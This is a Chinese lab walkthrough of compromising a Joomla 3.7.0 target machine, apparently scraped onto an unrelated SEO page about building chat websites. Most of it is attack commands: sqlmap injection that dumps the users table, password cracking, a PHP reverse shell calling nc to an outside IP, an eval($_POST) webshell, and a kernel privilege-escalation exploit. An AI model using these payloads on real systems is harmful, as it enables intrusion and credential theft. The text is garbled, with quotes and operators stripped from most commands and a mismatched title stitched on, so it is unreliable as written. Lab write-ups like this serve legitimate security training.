当前位置：首页 > news >正文

建设可以聊天的网站网站建设前期开发

news 2025/12/3 13:37:35

建设可以聊天的网站,网站建设前期开发,建设银行个人网站官网,手机网站建设计1. 靶机介绍主要的内容有 sql 注入漏洞、joomla 框架漏洞、ssh 攻击、shell 反弹、提权信息收集(ip、端口、目录、指纹信息)---利用漏洞---反弹----提权 2. 信息收集 2.1. 扫描存活 ip 192.168.220.134 2.2. 端口扫描 nmap -T4 -A -p- 192.168.220.134 …1. 靶机介绍主要的内容有 sql 注入漏洞、joomla 框架漏洞、ssh 攻击、shell 反弹、提权信息收集(ip、端口、目录、指纹信息)---利用漏洞---反弹----提权 2. 信息收集 2.1. 扫描存活 ip 192.168.220.134 2.2. 端口扫描 nmap -T4 -A -p- 192.168.220.134 通过对端口扫描发现对外开放了 80 端口然后进行访问还发现了当前主机的 CMS 是 Joomla 2.3. 敏感目录扫描 nikto -h 192.168.220.134 administrator/index.php 通过对敏感目录扫描可以发现后台管理的登录页面尝试访问 2.4. 通过 joomscan 扫描相关的漏洞 joomscan --url http://192.168.220.134 2.5. 扫描 joomla存在的漏洞 searchsploit Joomla 3.7.0 结合漏洞的文件名叫 42033.txt查找这个文件所在的具体位置 find / -name 42033.txt 查看文件的内容 cat /usr/share/exploitdb/exploits/php/webapps/42033.txt 3.漏洞利用 3.1. sql 注入漏洞 sqlmap -u http://localhost/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering] 利用提供的 sqlmap 进行数据库爆破 sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb --tables -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb -T #__users --columns -p list[fullordering] sqlmap -u http://192.168.220.134/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb -T #__users -C name,password --dump -p list[fullordering] $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 此时获取到账号和密码但是密码被加密了可以通过 kali 内置的 john 工具进行解密首先需要将密文保存在一个 txt 文件中 vim jop.txt john --show jop.txt 得到密码是snoopy 用户名admin 登录 3.2. shell 反弹可以发现这个区域能够写入 php 代码此时可以联想1.可以写一句话木马然后通过蚁剑连接2.进行 shell 反弹此时我们可以先新建一个 shell.php 文件然后写入反弹的 shell ?php system(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.126.138 6666 /tmp/f);? 在 kali 中开启 nc 监听 nc -lvp 6666 接下来需要访问 shell.php 文件 http://192.168.220.134/templates/beez3/shell.php 使用 python 脚本设置命令行 python -c import pty;pty.spawn(/bin/bash) 接下来尝试使用用户提权发现行不通 sudo -l 可以尝试使用操作系统提权方式,先查看操作系统的版本信息 cat /etc/issue 3.3. 发现操作系统的漏洞接下来搜索操作系统的漏洞 searchsploit Ubuntu 16.04 Privilege Escalation 权限升级 searchsploit -p linux/local/39772.txtcat /usr/share/exploitdb/exploits/linux/local/39772.txt 3.4. 利用操作系统漏洞需要通过这个 39772.zip 这个压缩包来进行提权在本地下载这个文件然后通过蚁剑进行上传首先先需要创建一个 one.php 文件并写入一句话木马 ?php eval($_POST[123])? 需要访问这个 one.php让木马生效接下来使用蚁剑来进行连接进入服务器内容进行压缩包的解压 cd 39772lstar -xvf exploit.tar 3.5. 利用工具进行提权进入目录并执行文件最后提权成功 cd ebpf_mapfd_doubleput_exploit./compile.sh./doubleput 3.6. 找到最终的 flag 进入/root 目录最终进行提权 cd /rootcat the-flag.txt

查看全文

http://www.dnsts.com.cn/news/76457.html